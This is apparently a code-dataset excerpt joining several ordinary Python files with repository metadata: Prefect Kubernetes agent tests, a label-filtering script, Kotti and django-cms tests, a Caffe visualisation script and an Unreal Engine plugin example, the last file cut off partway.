job_labels = template.setdefault("metadata", {}).setdefault("labels", {})
pod_labels = (
template["spec"]["template"]
.setdefault("metadata", {})
.setdefault("labels", {})
)
job_labels.update({"JOB_LABEL": "VALUE1"})
pod_labels.update({"POD_LABEL": "VALUE2"})
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.job_template_path = template_path
flow_run = self.build_flow_run(KubernetesRun())
job = self.agent.generate_job_spec(flow_run)
identifier = job["metadata"]["labels"]["prefect.io/identifier"]
labels = {
"prefect.io/identifier": identifier,
"prefect.io/flow_run_id": flow_run.id,
"prefect.io/flow_id": flow_run.flow.id,
}
assert job["metadata"]["name"]
assert job["metadata"]["labels"] == dict(JOB_LABEL="VALUE1", **labels)
assert job["spec"]["template"]["metadata"]["labels"] == dict(
POD_LABEL="VALUE2", **labels
)
assert job["spec"]["template"]["spec"]["restartPolicy"] == "Never"
@pytest.mark.parametrize(
"run_config, storage, on_template, expected",
[
(
KubernetesRun(),
Docker(registry_url="test", image_name="name", image_tag="tag"),
None,
"test/name:tag",
),
(
KubernetesRun(),
Docker(registry_url="test", image_name="name", image_tag="tag"),
"default-image",
"test/name:tag",
),
(KubernetesRun(image="myimage"), Local(), None, "myimage"),
(KubernetesRun(image="myimage"), Local(), "default-image", "myimage"),
(KubernetesRun(), Local(), None, "prefecthq/prefect:0.13.0"),
(KubernetesRun(), Local(), "default-image", "default-image"),
],
ids=[
"on-storage",
"on-storage-2",
"on-run_config",
"on-run_config-2",
"on-template",
"default",
],
)
def test_generate_job_spec_image(
self, tmpdir, run_config, storage, on_template, expected
):
if on_template:
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
template["spec"]["template"]["spec"]["containers"][0]["image"] = on_template
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.job_template_path = template_path
flow_run = self.build_flow_run(run_config, storage)
job = self.agent.generate_job_spec(flow_run)
image = job["spec"]["template"]["spec"]["containers"][0]["image"]
assert image == expected
@pytest.mark.parametrize(
"core_version, expected",
[
("0.12.0", "prefect execute cloud-flow"),
("0.14.0", "prefect execute flow-run"),
],
)
def test_generate_job_spec_container_args(self, core_version, expected):
flow_run = self.build_flow_run(KubernetesRun(), core_version=core_version)
job = self.agent.generate_job_spec(flow_run)
args = job["spec"]["template"]["spec"]["containers"][0]["args"]
assert args == expected.split()
def test_generate_job_spec_environment_variables(self, tmpdir, backend):
"""Check that environment variables are set in precedence order
- CUSTOM1 & CUSTOM2 are set on the template
- CUSTOM2 & CUSTOM3 are set on the agent
- CUSTOM3 & CUSTOM4 are set on the RunConfig
"""
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
template_env = template["spec"]["template"]["spec"]["containers"][0].setdefault(
"env", []
)
template_env.extend(
[
{"name": "CUSTOM1", "value": "VALUE1"},
{"name": "CUSTOM2", "value": "VALUE2"},
]
)
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.job_template_path = template_path
self.agent.env_vars = {"CUSTOM2": "OVERRIDE2", "CUSTOM3": "VALUE3"}
run_config = KubernetesRun(
image="test-image", env={"CUSTOM3": "OVERRIDE3", "CUSTOM4": "VALUE4"}
)
flow_run = self.build_flow_run(run_config)
job = self.agent.generate_job_spec(flow_run)
env_list = job["spec"]["template"]["spec"]["containers"][0]["env"]
env = {item["name"]: item["value"] for item in env_list}
assert env == {
"PREFECT__BACKEND": backend,
"PREFECT__CLOUD__AGENT__LABELS": "[]",
"PREFECT__CLOUD__API": prefect.config.cloud.api,
"PREFECT__CLOUD__AUTH_TOKEN": prefect.config.cloud.agent.auth_token,
"PREFECT__CLOUD__USE_LOCAL_SECRETS": "false",
"PREFECT__CONTEXT__FLOW_RUN_ID": flow_run.id,
"PREFECT__CONTEXT__FLOW_ID": flow_run.flow.id,
"PREFECT__CONTEXT__IMAGE": "test-image",
"PREFECT__LOGGING__LOG_TO_CLOUD": str(self.agent.log_to_cloud).lower(),
"PREFECT__ENGINE__FLOW_RUNNER__DEFAULT_CLASS": "prefect.engine.cloud.CloudFlowRunner",
"PREFECT__ENGINE__TASK_RUNNER__DEFAULT_CLASS": "prefect.engine.cloud.CloudTaskRunner",
"PREFECT__LOGGING__LEVEL": prefect.config.logging.level,
"CUSTOM1": "VALUE1",
"CUSTOM2": "OVERRIDE2", # Agent env-vars override those in template
"CUSTOM3": "OVERRIDE3", # RunConfig env-vars override those on agent and template
"CUSTOM4": "VALUE4",
}
@pytest.mark.parametrize(
"config, agent_env_vars, run_config_env_vars, expected_logging_level",
[
({"logging.level": "DEBUG"}, {}, {}, "DEBUG"),
(
{"logging.level": "DEBUG"},
{"PREFECT__LOGGING__LEVEL": "TEST2"},
{},
"TEST2",
),
(
{"logging.level": "DEBUG"},
{"PREFECT__LOGGING__LEVEL": "TEST2"},
{"PREFECT__LOGGING__LEVEL": "TEST"},
"TEST",
),
],
)
def test_generate_job_spec_prefect_logging_level_environment_variable(
self,
config,
agent_env_vars,
run_config_env_vars,
expected_logging_level,
tmpdir,
backend,
):
"""
Check that PREFECT__LOGGING__LEVEL is set in precedence order
"""
with set_temporary_config(config):
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
template_env = template["spec"]["template"]["spec"]["containers"][
0
].setdefault("env", [])
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.job_template_path = template_path
self.agent.env_vars = agent_env_vars
run_config = KubernetesRun(image="test-image", env=run_config_env_vars)
flow_run = self.build_flow_run(run_config)
job = self.agent.generate_job_spec(flow_run)
env_list = job["spec"]["template"]["spec"]["containers"][0]["env"]
env = {item["name"]: item["value"] for item in env_list}
assert env["PREFECT__LOGGING__LEVEL"] == expected_logging_level
def test_generate_job_spec_resources(self):
flow_run = self.build_flow_run(
KubernetesRun(
cpu_request=1, cpu_limit=2, memory_request="4G", memory_limit="8G"
)
)
job = self.agent.generate_job_spec(flow_run)
resources = job["spec"]["template"]["spec"]["containers"][0]["resources"]
assert resources == {
"limits": {"cpu": "2", "memory": "8G"},
"requests": {"cpu": "1", "memory": "4G"},
}
def test_generate_job_spec_service_account_name(self, tmpdir):
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
template["spec"]["template"]["spec"]["serviceAccountName"] = "on-agent-template"
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.service_account_name = "on-agent"
self.agent.job_template_path = template_path
template["spec"]["template"]["spec"][
"serviceAccountName"
] = "on-run-config-template"
run_config = KubernetesRun(
job_template=template, service_account_name="on-run-config"
)
# Check precedence order:
        # 1. Explicit on run-config
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["serviceAccountName"] == "on-run-config"
# 2. In job template on run-config
run_config.service_account_name = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert (
job["spec"]["template"]["spec"]["serviceAccountName"]
== "on-run-config-template"
)
# None in run-config job template is still used
run_config.job_template["spec"]["template"]["spec"]["serviceAccountName"] = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["serviceAccountName"] is None
# 3. Explicit on agent
# Not present in job template
run_config.job_template["spec"]["template"]["spec"].pop("serviceAccountName")
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["serviceAccountName"] == "on-agent"
# No job template present
run_config.job_template = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["serviceAccountName"] == "on-agent"
# 4. In job template on agent
self.agent.service_account_name = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert (
job["spec"]["template"]["spec"]["serviceAccountName"] == "on-agent-template"
)
def test_generate_job_spec_image_pull_secrets(self, tmpdir):
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
template["spec"]["template"]["spec"]["imagePullSecrets"] = [
{"name": "on-agent-template"}
]
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.image_pull_secrets = ["on-agent"]
self.agent.job_template_path = template_path
template["spec"]["template"]["spec"]["imagePullSecrets"] = [
{"name": "on-run-config-template"}
]
run_config = KubernetesRun(
job_template=template, image_pull_secrets=["on-run-config"]
)
# Check precedence order:
        # 1. Explicit on run-config
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "on-run-config"}
]
# 2. In job template on run-config
run_config.image_pull_secrets = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "on-run-config-template"}
]
# None in run-config job template is still used
run_config.job_template["spec"]["template"]["spec"]["imagePullSecrets"] = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] is None
# 3. Explicit on agent
# Not present in job template
run_config.job_template["spec"]["template"]["spec"].pop("imagePullSecrets")
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "on-agent"}
]
# No job template present
run_config.job_template = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "on-agent"}
]
# 4. In job template on agent
self.agent.image_pull_secrets = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "on-agent-template"}
]
@pytest.mark.parametrize("image_pull_policy", ["Always", "Never", "IfNotPresent"])
def test_generate_job_spec_sets_image_pull_policy_from_run_config(
self, image_pull_policy
):
template = self.read_default_template()
config = KubernetesRun(
job_template=template, image_pull_policy=image_pull_policy
)
flow_run = self.build_flow_run(config)
job = self.agent.generate_job_spec(flow_run)
assert (
job["spec"]["template"]["spec"]["containers"][0]["imagePullPolicy"]
== image_pull_policy
)
| avg_line_length: 34.375738 | max_line_length: 98 | alphanum_fraction: 0.615741 |

hexsha: c70f98145fb67b09841dceb5edce4bcd3d8a11f8 | size: 2,188 | ext: py | lang: Python
max_stars_repo_path: filter_multilabels.py | max_stars_repo_name: seanliu96/PCHC | max_stars_repo_head_hexsha: 62acc96a271b56243deabb9418eb39ae3e3710aa | max_stars_repo_licenses: ["MIT"] | max_stars_count: 10 | max_stars_repo_stars_event_min_datetime: 2019-03-11T08:40:15.000Z | max_stars_repo_stars_event_max_datetime: 2021-07-11T13:53:44.000Z
max_issues_repo_path: filter_multilabels.py | max_issues_repo_name: seanliu96/PCHC | max_issues_repo_head_hexsha: 62acc96a271b56243deabb9418eb39ae3e3710aa | max_issues_repo_licenses: ["MIT"] | max_issues_count: 3 | max_issues_repo_issues_event_min_datetime: 2019-03-10T18:06:32.000Z | max_issues_repo_issues_event_max_datetime: 2019-05-25T06:53:09.000Z
max_forks_repo_path: filter_multilabels.py | max_forks_repo_name: seanliu96/PCHC | max_forks_repo_head_hexsha: 62acc96a271b56243deabb9418eb39ae3e3710aa | max_forks_repo_licenses: ["MIT"] | max_forks_count: 5 | max_forks_repo_forks_event_min_datetime: 2019-03-10T17:54:16.000Z | max_forks_repo_forks_event_max_datetime: 2021-11-11T14:30:57.000Z

content:
import logging
import logging.config
import logconfig
import os
import settings
from collections import defaultdict, Counter
def filter_multilabels(input_dir):
logger = logging.getLogger(__name__)
logger.info(logconfig.key_log(logconfig.DATA_NAME, input_dir))
paths = []
for file_name in os.listdir(input_dir):
if os.path.splitext(file_name)[-1].startswith('.depth'):
paths.append(os.path.join(input_dir, file_name))
paths.sort()
valid_id_counter = Counter()
for depth in range(len(paths)):
doc_topic_id = defaultdict(lambda: defaultdict(lambda: set())) # doc_topic[i][j] means a set about a document with [doc_text i] and [topic j]
with open(paths[depth], 'r', encoding='utf-8') as f:
line = f.readline()
while line:
line = line.strip()
if line:
line_sp = line.split('\t')
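                    # each line appears to be "<id>\t<doc_text>\t<label1>;<label2>;..." (labels terminated by ';')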
topics = line_sp[2].split(';')
                    if len(topics) == 2: # an empty string will be at the end
doc_topic_id[line_sp[1]][topics[0]].add(line)
line = f.readline()
with open(paths[depth] + '.filtered', 'w', encoding='utf-8') as f:
for doc, y in doc_topic_id.items():
# multi-label
if len(y) > 1:
continue
for xx, yy in y.items():
# just keep one document
lines = sorted(list(yy))
line = lines[0]
doc_id = line.split('\t', 1)[0]
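                    # a document id is kept at this depth only if it was also kept at the
                    # previous depth; bit `depth` of valid_id_counter records that decision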
if depth == 0 or (valid_id_counter[doc_id] & (1 << (depth-1))):
valid_id_counter[doc_id] += (1 << depth)
f.write(line)
f.write('\n')
break
logger.info(logconfig.key_log(logconfig.DEPTH, str(depth)))
if __name__ == '__main__':
log_filename = os.path.join(settings.log_dir, 'filter_multilabels.log')
logconfig.logging.config.dictConfig(logconfig.logging_config_dict('INFO', log_filename))
for input_dir in settings.input_dirs:
filter_multilabels(input_dir)
| avg_line_length: 40.518519 | max_line_length: 150 | alphanum_fraction: 0.554388 |

hexsha: 11402c2002d878dc66852399185b09a9c5e0db90 | size: 779 | ext: py | lang: Python
max_stars_repo_path: kotti/tests/test_static.py | max_stars_repo_name: mete0r/Kotti | max_stars_repo_head_hexsha: e89103cc57d5d2af8d60eb8208ae9d04c068f6e7 | max_stars_repo_licenses: ["Naumen", "Condor-1.1", "MS-PL"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: kotti/tests/test_static.py | max_issues_repo_name: mete0r/Kotti | max_issues_repo_head_hexsha: e89103cc57d5d2af8d60eb8208ae9d04c068f6e7 | max_issues_repo_licenses: ["Naumen", "Condor-1.1", "MS-PL"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: kotti/tests/test_static.py | max_forks_repo_name: mete0r/Kotti | max_forks_repo_head_hexsha: e89103cc57d5d2af8d60eb8208ae9d04c068f6e7 | max_forks_repo_licenses: ["Naumen", "Condor-1.1", "MS-PL"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null

content:
from pytest import raises
class TestStatic:
def test_NeededGroup(self):
from js.deform import deform_js
from kotti.fanstatic import kotti_js
from kotti.fanstatic import NeededGroup
def NeededGroupFactory(resources):
return NeededGroup(resources)
with raises(ValueError):
NeededGroupFactory("foo")
with raises(ValueError):
NeededGroupFactory(["foo", "bar"])
needed = NeededGroup([deform_js, ])
assert needed.resources == [deform_js, ]
needed.add(kotti_js)
assert needed.resources == [deform_js, kotti_js]
def needed_group_adder(resource):
needed.add(resource)
with raises(ValueError):
needed_group_adder(42)
| avg_line_length: 23.606061 | max_line_length: 56 | alphanum_fraction: 0.631579 |

hexsha: 828492e836678112bccbcec3ca1abe04502d4364 | size: 4,698 | ext: py | lang: Python
max_stars_repo_path: examples/1_H_examples/ucsd_conv_lstm_AE_futurePrediction/network_surgery.py | max_stars_repo_name: t2mhanh/caffe_anaconda | max_stars_repo_head_hexsha: 4f31996df63d9148de046d1b54fa1cc4e862ba83 | max_stars_repo_licenses: ["BSD-2-Clause"] | max_stars_count: 1 | max_stars_repo_stars_event_min_datetime: 2018-11-23T08:45:35.000Z | max_stars_repo_stars_event_max_datetime: 2018-11-23T08:45:35.000Z
max_issues_repo_path: examples/1_H_examples/ucsd_conv_lstm_AE_futurePrediction/network_surgery.py | max_issues_repo_name: t2mhanh/caffe_convLSTM_WTA | max_issues_repo_head_hexsha: 4f31996df63d9148de046d1b54fa1cc4e862ba83 | max_issues_repo_licenses: ["BSD-2-Clause"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: examples/1_H_examples/ucsd_conv_lstm_AE_futurePrediction/network_surgery.py | max_forks_repo_name: t2mhanh/caffe_convLSTM_WTA | max_forks_repo_head_hexsha: 4f31996df63d9148de046d1b54fa1cc4e862ba83 | max_forks_repo_licenses: ["BSD-2-Clause"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null

content:
import sys
caffe_root = '/home/csunix/schtmt/NewFolder/caffe_May2017_PythonLayer/'
sys.path.insert(0,caffe_root + 'python')
import numpy as np
import h5py
import matplotlib.pyplot as plt
import caffe
from matplotlib.backends.backend_pdf import PdfPages
def H_visualize_weights(net, layer_name, padding=4, filename=''):
# follow the method of "display_network.m"
# The parameters are a list of [weights, biases]
data = np.copy(net.params[layer_name][0].data)
# N is the total number of convolutions
N = data.shape[0] * data.shape[1]
print N
print data.shape
# a = data[1,0,:,:]
# print abs(a).min()
# Ensure the resulting image is square
filters_per_row = int(np.ceil(np.sqrt(N)))
# Assume the filters are square
filter_size = data.shape[2]
# Size of the result image including padding
result_size = filters_per_row * (filter_size + padding) - padding
# Initialize result image to all zeros
result = np.ones((result_size, result_size))
# Tile the filters into the result image
filter_x = 0
filter_y = 0
for n in range(data.shape[0]):
for c in range(data.shape[1]):
if filter_x == filters_per_row:
filter_y += 1
filter_x = 0
# for i in range(filter_size):
# for j in range(filter_size):
# result[filter_y * (filter_size + padding) + i, filter_x * (filter_size + padding) + j] = data[
# n, c, i, j]
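            # scale each filter by its own max absolute value so every tile uses the full gray range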
result_temp = data[n,c,:,:]
clim = abs(result_temp).max()
result[filter_y * (filter_size + padding):filter_y * (filter_size + padding) + filter_size,
filter_x * (filter_size + padding):filter_x * (filter_size + padding) + filter_size] = data[n,c,:,:]/clim
filter_x += 1
print result.shape
# # Normalize image to 0-1
# min = result.min()
# max = result.max()
# result = (result - min) / (max - min)
# Plot figure
plt.figure(figsize=(10, 10))
plt.axis('off')
plt.imshow(result, cmap='gray', interpolation='nearest')
# Save plot if filename is set
if filename != '':
plt.savefig(filename, bbox_inches='tight', pad_inches=0)
plt.show()
def show_activation(net,blob_name):
# net.forward()
data = np.copy(net.blobs[blob_name].data)
print np.shape(data)
acti_min, acti_max = data.min(), data.max()
plt.figure()
for n in range(np.shape(data)[0]):
plt.axis('off')
plt.imshow(data[n,0,0,:,:],vmin=acti_min, vmax=acti_max,cmap='gray')
plt.savefig('testData'+blob_name+str(n), bbox_inches='tight', pad_inches=0)
#-----------------------------------------------------------------------------------------------------------------------
caffe.set_mode_cpu()
# caffe.set_mode_gpu()
model_def = caffe_root + 'examples/1_H_examples/UCSD_conv_lstm/ucsd_wta_autoencoder3_test.prototxt'
# model_weights = caffe_root + 'examples/1_H_examples/conv_lstm_autoencoder/conv_lstm_relu_AE_iter_20000.caffemodel' # ERROR > 50
model_weights = '/usr/not-backed-up/1_convlstm/ucsd_rmsProp/wta_autoencoder_iter_120000.caffemodel' #ERROR = 0.1088
# Load model
net = caffe.Net(model_def,model_weights, caffe.TEST)
print("blobs {}\nparams {}".format(net.blobs.keys(), net.params.keys()))
print [(k, i, p.data.shape) for k in net.params for i, p in enumerate(net.params[k])]
# w = np.copy(net.params['deconv'][0].data)
w = np.copy(net.params['conv1'][0].data)
# NOTE: this HDF5 dump references names that are never defined in this script
# (save_path, i, input), so it is commented out to keep the script runnable.
# h5f = h5py.File(save_path+'USCDpatch48_'+str(i+1)+'.h5','w')
# h5f.create_dataset('input',shape =np.shape(input), dtype=float32)
# h5f['input'][:] = input
# h5f.close()
print np.shape(w)
plt.figure()
plt.imshow(w[0,0,:,:])
plt.axis('off')
plt.show()
# print([(k, v[0].data.shape) for k, v in net.params.items()])
# print "Total number of parameters: " + str(sum([prod(v[0].data.shape) for k, v in net.params.items()]))
# # visualize_weights(net, 'deconv', filename='deconv_batchSize2.png')
# # H_visualize_weights(net, 'deconv', filename='deconv_MatlabDisplay_batchSize2.png')
# h5f = h5py.File('/usr/not-backed-up/1_convlstm/bouncing_mnist_test_AE.h5','r')
# data = h5f['input'][:]
# h5f.close()
# # # print np.shape(data)
# data1 = data[0,:,:,:]
# data1 = np.reshape(data1,(1,10,64,64))
# # print np.shape(data1)
#
# # a = np.copy(net.blobs['input'].data)
# # print np.shape(a)
# net.blobs['input'].reshape(*data1.shape)
# net.blobs['input'].data[...] = data1
# net.blobs['match'].reshape(*data1.shape)
# net.blobs['match'].data[...] = data1
# net.forward()
# myloss = np.copy(net.blobs['l2_error'].data)
# print myloss
# show_activation(net,'match_p_r')
# show_activation(net,'output')
| avg_line_length: 38.826446 | max_line_length: 129 | alphanum_fraction: 0.635802 |

hexsha: 6b021b41076e5fc9c8138408a2cfba6906ae6a56 | size: 447 | ext: py | lang: Python
max_stars_repo_path: examples/register_new_native_component.py | max_stars_repo_name: avivazran/UnrealEnginePython | max_stars_repo_head_hexsha: 758ad1e5b3a871442d00bdc3144e246fa443098f | max_stars_repo_licenses: ["MIT"] | max_stars_count: 2,350 | max_stars_repo_stars_event_min_datetime: 2016-08-08T17:00:16.000Z | max_stars_repo_stars_event_max_datetime: 2022-03-31T22:37:15.000Z
max_issues_repo_path: examples/register_new_native_component.py | max_issues_repo_name: avivazran/UnrealEnginePython | max_issues_repo_head_hexsha: 758ad1e5b3a871442d00bdc3144e246fa443098f | max_issues_repo_licenses: ["MIT"] | max_issues_count: 820 | max_issues_repo_issues_event_min_datetime: 2016-08-08T16:35:26.000Z | max_issues_repo_issues_event_max_datetime: 2022-03-24T05:09:51.000Z
max_forks_repo_path: examples/register_new_native_component.py | max_forks_repo_name: avivazran/UnrealEnginePython | max_forks_repo_head_hexsha: 758ad1e5b3a871442d00bdc3144e246fa443098f | max_forks_repo_licenses: ["MIT"] | max_forks_count: 658 | max_forks_repo_forks_event_min_datetime: 2016-08-10T16:26:24.000Z | max_forks_repo_forks_event_max_datetime: 2022-03-30T02:42:22.000Z

content:
import unreal_engine as ue
from unreal_engine.classes import ActorComponent
class FooComponent(ActorComponent):
def __init__(self):
ue.log('Ctor')
def DoSomething():
ue.print_string('TEST !!!')
FooComponent.set_metadata('BlueprintType', 'true')
FooComponent.set_metadata('BlueprintSpawnableComponent', 'true')
FooComponent.set_metadata('IsBlueprintBase', 'true')
FooComponent.component_type_registry_invalidate_class()
| avg_line_length: 27.9375 | max_line_length: 64 | alphanum_fraction: 0.771812 |

hexsha: 6c7d52943c0c4ea8c4fd137d01a4284f85b69fd8 | size: 51,194 | ext: py | lang: Python
max_stars_repo_path: cms/tests/test_permmod.py | max_stars_repo_name: Qurus/django-cms | max_stars_repo_head_hexsha: 77f41ce69132b6103e147343d7cbb7fca6265bf1 | max_stars_repo_licenses: ["BSD-3-Clause"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: cms/tests/test_permmod.py | max_issues_repo_name: Qurus/django-cms | max_issues_repo_head_hexsha: 77f41ce69132b6103e147343d7cbb7fca6265bf1 | max_issues_repo_licenses: ["BSD-3-Clause"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: cms/tests/test_permmod.py | max_forks_repo_name: Qurus/django-cms | max_forks_repo_head_hexsha: 77f41ce69132b6103e147343d7cbb7fca6265bf1 | max_forks_repo_licenses: ["BSD-3-Clause"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null

content:
# -*- coding: utf-8 -*-
from __future__ import with_statement
from djangocms_text_ckeditor.models import Text
from django.contrib.admin.sites import site
try:
from django.contrib.admin.utils import unquote
except ImportError:
from django.contrib.admin.util import unquote
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser, Group, Permission
from django.contrib.sites.models import Site
from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.test.client import RequestFactory
from django.test.utils import override_settings
from cms.api import (add_plugin, assign_user_to_page, create_page,
create_page_user, publish_page)
from cms.admin.forms import save_permissions
from cms.cms_menus import get_visible_pages
from cms.constants import PUBLISHER_STATE_PENDING
from cms.management.commands.subcommands.moderator import log
from cms.models import Page, CMSPlugin, Title, ACCESS_PAGE
from cms.models.permissionmodels import (ACCESS_DESCENDANTS,
ACCESS_PAGE_AND_DESCENDANTS,
PagePermission,
GlobalPagePermission)
from cms.plugin_pool import plugin_pool
from cms.test_utils.testcases import (URL_CMS_PAGE_ADD, URL_CMS_PLUGIN_REMOVE,
URL_CMS_PLUGIN_ADD, CMSTestCase)
from cms.test_utils.util.context_managers import disable_logger
from cms.test_utils.util.fuzzy_int import FuzzyInt
from cms.utils.i18n import force_language
from cms.utils.page_resolver import get_page_from_path
from cms.utils.permissions import (has_page_add_permission,
has_page_change_permission,
has_generic_permission)
def fake_tree_attrs(page):
page.depth = 1
page.path = '0001'
page.numchild = 0
@override_settings(CMS_PERMISSION=True)
class PermissionModeratorTests(CMSTestCase):
"""Permissions and moderator together
    Fixtures contain 3 users, 1 published page and some other stuff
Users:
1. `super`: superuser
2. `master`: user with permissions to all applications
3. `slave`: user assigned to page `slave-home`
Pages:
1. `home`:
- published page
- master can do anything on its subpages, but not on home!
2. `master`:
- published page
- created by super
- `master` can do anything on it and its descendants
- subpages:
3. `slave-home`:
- not published
- assigned slave user which can add/change/delete/
move/publish this page and its descendants
- `master` user want to moderate this page and all descendants
4. `pageA`:
- created by super
- master can add/change/delete on it and descendants
"""
#TODO: Split this test case into one that tests publish functionality, and
#TODO: one that tests permission inheritance. This is too complex.
def setUp(self):
# create super user
self.user_super = self._create_user("super", is_staff=True,
is_superuser=True)
self.user_staff = self._create_user("staff", is_staff=True,
add_default_permissions=True)
self.user_master = self._create_user("master", is_staff=True,
add_default_permissions=True)
self.user_slave = self._create_user("slave", is_staff=True,
add_default_permissions=True)
self.user_normal = self._create_user("normal", is_staff=False)
self.user_normal.user_permissions.add(
Permission.objects.get(codename='publish_page'))
with self.login_user_context(self.user_super):
self.home_page = create_page("home", "nav_playground.html", "en",
created_by=self.user_super)
# master page & master user
self.master_page = create_page("master", "nav_playground.html", "en")
# create non global, non staff user
self.user_non_global = self._create_user("nonglobal")
# assign master user under home page
assign_user_to_page(self.home_page, self.user_master,
grant_on=ACCESS_DESCENDANTS, grant_all=True)
# and to master page
assign_user_to_page(self.master_page, self.user_master,
grant_on=ACCESS_PAGE_AND_DESCENDANTS, grant_all=True)
# slave page & slave user
self.slave_page = create_page("slave-home", "col_two.html", "en",
parent=self.master_page, created_by=self.user_super)
assign_user_to_page(self.slave_page, self.user_slave, grant_all=True)
# create page_b
page_b = create_page("pageB", "nav_playground.html", "en", created_by=self.user_super)
# Normal user
# it's allowed for the normal user to view the page
assign_user_to_page(page_b, self.user_normal, can_view=True)
# create page_a - sample page from master
page_a = create_page("pageA", "nav_playground.html", "en",
created_by=self.user_super)
assign_user_to_page(page_a, self.user_master,
can_add=True, can_change=True, can_delete=True, can_publish=True,
can_move_page=True)
# publish after creating all drafts
publish_page(self.home_page, self.user_super, 'en')
publish_page(self.master_page, self.user_super, 'en')
self.page_b = publish_page(page_b, self.user_super, 'en')
def _add_plugin(self, user, page):
"""
Add a plugin using the test client to check for permissions.
"""
with self.login_user_context(user):
placeholder = page.placeholders.all()[0]
post_data = {
'plugin_language': 'en',
'plugin_parent': '',
'placeholder_id': placeholder.pk,
'plugin_type': 'TextPlugin'
}
url = URL_CMS_PLUGIN_ADD
response = self.client.post(url, post_data)
self.assertEqual(response.status_code, 200)
return response.content.decode('utf8')
def test_super_can_add_page_to_root(self):
with self.login_user_context(self.user_super):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 200)
def test_master_cannot_add_page_to_root(self):
with self.login_user_context(self.user_master):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_cannot_add_page_to_root(self):
with self.login_user_context(self.user_slave):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_can_add_page_under_slave_home(self):
with self.login_user_context(self.user_slave):
# move to admin.py?
# url = URL_CMS_PAGE_ADD + "?target=%d&position=last-child" % slave_page.pk
# can he even access it over get?
# response = self.client.get(url)
# self.assertEqual(response.status_code, 200)
# add page
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page, created_by=self.user_slave)
# adds user_slave as page moderator for this page
# public model shouldn't be available yet, because of the moderation
# moderators and approval ok?
# must not have public object yet
self.assertFalse(page.publisher_public)
self.assertObjectExist(Title.objects, slug="page")
self.assertObjectDoesNotExist(Title.objects.public(), slug="page")
self.assertTrue(has_generic_permission(page.pk, self.user_slave, "publish", 1))
# publish as slave, published as user_master before
publish_page(page, self.user_slave, 'en')
# user_slave is moderator for this page
# approve / publish as user_slave
# user master should be able to approve as well
@override_settings(
CMS_PLACEHOLDER_CONF={
'col_left': {
'default_plugins': [
{
'plugin_type': 'TextPlugin',
'values': {
'body': 'Lorem ipsum dolor sit amet, consectetur adipisicing elit. Culpa, repellendus, delectus, quo quasi ullam inventore quod quam aut voluptatum aliquam voluptatibus harum officiis officia nihil minus unde accusamus dolorem repudiandae.'
},
},
]
},
},
)
def test_default_plugins(self):
with self.login_user_context(self.user_slave):
self.assertEqual(CMSPlugin.objects.count(), 0)
response = self.client.get(self.slave_page.get_absolute_url(), {'edit': 1})
self.assertEqual(response.status_code, 200)
self.assertEqual(CMSPlugin.objects.count(), 1)
def test_page_added_by_slave_can_be_published_by_user_master(self):
# add page
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page, created_by=self.user_slave)
# same as test_slave_can_add_page_under_slave_home
# must not have public object yet
self.assertFalse(page.publisher_public)
self.assertTrue(has_generic_permission(page.pk, self.user_master, "publish", page.site.pk))
        # should be True: user_master should have publish permissions for children as well
publish_page(self.slave_page, self.user_master, 'en')
page = publish_page(page, self.user_master, 'en')
self.assertTrue(page.publisher_public_id)
# user_master is moderator for top level page / but can't approve descendants?
# approve / publish as user_master
# user master should be able to approve descendants
def test_super_can_add_plugin(self):
